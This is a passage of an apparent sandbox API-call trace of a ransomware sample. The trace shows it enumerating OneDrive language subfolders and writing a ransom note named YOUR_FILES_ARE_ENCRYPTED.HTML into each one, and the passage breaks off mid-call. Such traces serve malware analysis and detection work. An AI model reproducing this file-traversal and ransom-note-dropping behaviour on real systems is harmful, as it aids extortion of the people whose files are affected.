returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is" [0111.649] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\*" [0111.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bbcedb7, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x8bbcedb7, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x8edba01f, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0111.650] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bbcedb7, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x8bbcedb7, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x8edba01f, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="..", cAlternateFileName="")) returned 1 [0111.650] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8edba01f, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x8edba01f, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x8f89abc5, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0111.650] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.650] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\FileSync.LocalizedResources.dll.mui") returned 112 [0111.650] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.650] lstrlenW (lpString=".mui") returned 4 [0111.650] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.650] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8edba01f, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x8edba01f, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x8f89abc5, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0111.650] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0111.651] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0111.651] GetProcessHeap () returned 0x600000 [0111.651] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0111.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\is\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0111.652] WriteFile (in: hFile=0x334, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.653] CloseHandle (hObject=0x334) returned 1 [0111.653] GetProcessHeap () returned 0x600000 [0111.653] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0111.653] GetProcessHeap () returned 0x600000 [0111.653] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.655] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8fca0d59, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x8fca0d59, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x8fca0d59, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="it", cAlternateFileName="")) returned 1 [0111.655] StrStrIW (lpFirst="it", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.655] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it") returned 76 [0111.655] GetProcessHeap () returned 0x600000 [0111.655] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0111.656] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it" [0111.656] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\*" [0111.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8fca0d59, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x8fca0d59, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x907a79a9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName=".", cAlternateFileName="")) returned 0x626638 [0111.656] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8fca0d59, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x8fca0d59, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x907a79a9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="..", cAlternateFileName="")) returned 1 [0111.656] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907a79a9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x907a79a9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x90ea89ac, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0111.656] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.656] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\FileSync.LocalizedResources.dll.mui") returned 112 [0111.656] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.656] lstrlenW (lpString=".mui") returned 4 [0111.656] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.656] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907a79a9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x907a79a9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x90ea89ac, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0111.656] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0111.657] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0111.657] GetProcessHeap () returned 0x600000 [0111.657] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0111.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\it\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0111.657] WriteFile (in: hFile=0x334, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.659] CloseHandle (hObject=0x334) returned 1 [0111.659] GetProcessHeap () returned 0x600000 [0111.659] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0111.659] GetProcessHeap () returned 0x600000 [0111.659] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.660] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x90f6733c, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x90f6733c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x90f6733c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ja", cAlternateFileName="")) returned 1 [0111.660] StrStrIW (lpFirst="ja", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.660] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja") returned 76 [0111.660] GetProcessHeap () returned 0x600000 [0111.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0111.661] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja" [0111.661] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja\\*" [0111.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x90f6733c, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x90f6733c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x91510d84, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName=".", cAlternateFileName="")) returned 0x626838 [0111.662] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x90f6733c, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x90f6733c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x91510d84, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="..", cAlternateFileName="")) returned 1 [0111.662] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91510d84, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x91510d84, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9259b185, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0xfcc0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0111.662] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.662] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja\\FileSync.LocalizedResources.dll.mui") returned 112 [0111.663] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.663] lstrlenW (lpString=".mui") returned 4 [0111.663] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.663] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91510d84, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x91510d84, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9259b185, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0xfcc0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0111.663] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0111.663] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0111.663] GetProcessHeap () returned 0x600000 [0111.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0111.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\ja\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0111.664] WriteFile (in: hFile=0x334, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.665] CloseHandle (hObject=0x334) returned 1 [0111.665] GetProcessHeap () returned 0x600000 [0111.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0111.665] GetProcessHeap () returned 0x600000 [0111.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.666] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92954bae, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x92954bae, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x92954bae, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ka", cAlternateFileName="")) returned 1 [0111.666] StrStrIW (lpFirst="ka", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.666] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ka") returned 76 [0111.667] GetProcessHeap () returned 0x600000 [0111.667] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0111.668] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ka" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ka") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ka" [0111.668] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ka", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ka\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ka\\*" [0111.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ka\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92954bae, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x92954bae, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93186f59, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName=".", cAlternateFileName="")) returned 0x626638 [0111.668] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92954bae, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x92954bae, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93186f59, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="..", cAlternateFileName="")) returned 1 [0111.668] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93186f59, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93186f59, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93faeefa, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0111.668] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.668] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ka\\FileSync.LocalizedResources.dll.mui") returned 112 [0111.668] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.668] lstrlenW (lpString=".mui") returned 4 [0111.668] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.668] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93186f59, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93186f59, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93faeefa, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0111.668] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0111.669] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0111.669] GetProcessHeap () returned 0x600000 [0111.669] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0111.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\ka\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0111.669] WriteFile (in: hFile=0x334, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.671] CloseHandle (hObject=0x334) returned 1 [0111.671] GetProcessHeap () returned 0x600000 [0111.671] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0111.671] GetProcessHeap () returned 0x600000 [0111.671] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.672] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x944bfdaf, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x944bfdaf, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x944bfdaf, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kk", cAlternateFileName="")) returned 1 [0111.672] StrStrIW (lpFirst="kk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.672] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kk") returned 76 [0111.672] GetProcessHeap () returned 0x600000 [0111.672] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0111.673] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kk" [0111.673] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kk", lpString2="\\*" | out: 